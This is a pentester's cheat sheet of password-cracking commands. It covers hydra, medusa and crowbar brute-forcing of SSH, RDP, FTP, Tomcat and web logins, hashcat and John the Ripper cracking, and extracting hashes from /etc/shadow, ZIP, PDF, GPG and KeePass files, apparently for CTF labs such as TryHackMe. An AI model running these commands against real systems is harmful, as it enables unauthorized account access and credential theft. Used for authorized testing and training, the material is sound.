Password Cracking

Brute Force

Medusa

medusa -h <IP> -u <username> -P /usr/share/wordlists/rockyou.txt -M http -m DIR:/admin

Tomcat GET:

hydra -L /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt -P /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt http-get://<IP>:8080/manager/html

RDP:

crowbar -b rdp -s <IP> -u <username> -C rockyou.txt -n 1

Evil-winrm:

crackmapexec winrm <IP> -d <domain> -u users.txt -p password.txt

SSH:

hydra -l <username> -P /usr/share/wordlists/rockyou.txt ssh://<IP> -s <port>
hydra -l <username> -P /usr/share/wordlists/metasploit/unix_passwords.txt <IP> ssh -t 4 -V

HTTP-GET

hydra -l <user> -P /usr/share/wordlists/rockyou.txt http-get://<IP>

HTTP-POST

hydra <IP> http-form-post "/form/frontpage.php:user=<username>&pass=^PASS^:INVALID LOGIN" -l <username> -P /usr/share/wordlists/rockyou.txt -vV -f

hydra <IP> http-form-post "/form/frontpage.php:user=^USER^&pass=^PASS^:INVALID LOGIN" -L users.txt -P /usr/share/wordlists/rockyou.txt -vV -f

FTP

hydra -l <username> -P /usr/share/wordlists/rockyou.txt -vV <IP> ftp

ZIP

fcrackzip -v -u -D -p /usr/share/wordlists/rockyou.txt secrets.zip

Unshadow

/etc/shadow + /etc/passwd
# Grab both files and combine them with the following command
unshadow <passwd file> <shadow file> > unshadowed.txt

WordPress

wpscan --url <IP> -U users.txt -P pass.txt
wpscan --url http://test.com/

ASC

gpg2john tryhackme.asc > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash
gpg --import tryhackme.asc # Enter the recovered passphrase
gpg --decrypt credentials.pgp

HashCrack

Hash Finder

hashid <hash value>
hash-identifier
haiti 'hash' # Gives hashcat ID as well

Hashcat

Find Hash ID:
hashcat -h | grep -i <hash type>

Start Cracking:
hashcat -m <ID> 'hash' /usr/share/wordlists/rockyou.txt --force
hashcat 'hash' --show

hashcat -m <ID> <hash.txt> /usr/share/wordlists/rockyou.txt --force
hashcat <hash.txt> --show

John the Ripper (Windows hashes)

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt --format=NT
john --rules --wordlist=/usr/share/wordlists/rockyou.txt hash.txt --format=NT # Rules

John the Ripper (Linux hashes)

-> First combine the passwd and shadow files with unshadow, then run john on the output.
unshadow passwd-file.txt shadow-file.txt > unshadowed.txt
john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt

PDF or ZIP

# Extract the hash from a PDF
pdf2john test.pdf > hash
OR
zip2john test.zip > hash

# Crack the extracted hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash

Keepass Databases (.kdbx)

After obtaining a .kdbx file:
keepass2john Database.kdbx > keepass.hash
john --wordlist=rockyou.txt keepass.hash

Open the database with: keepass2 Database.kdbx
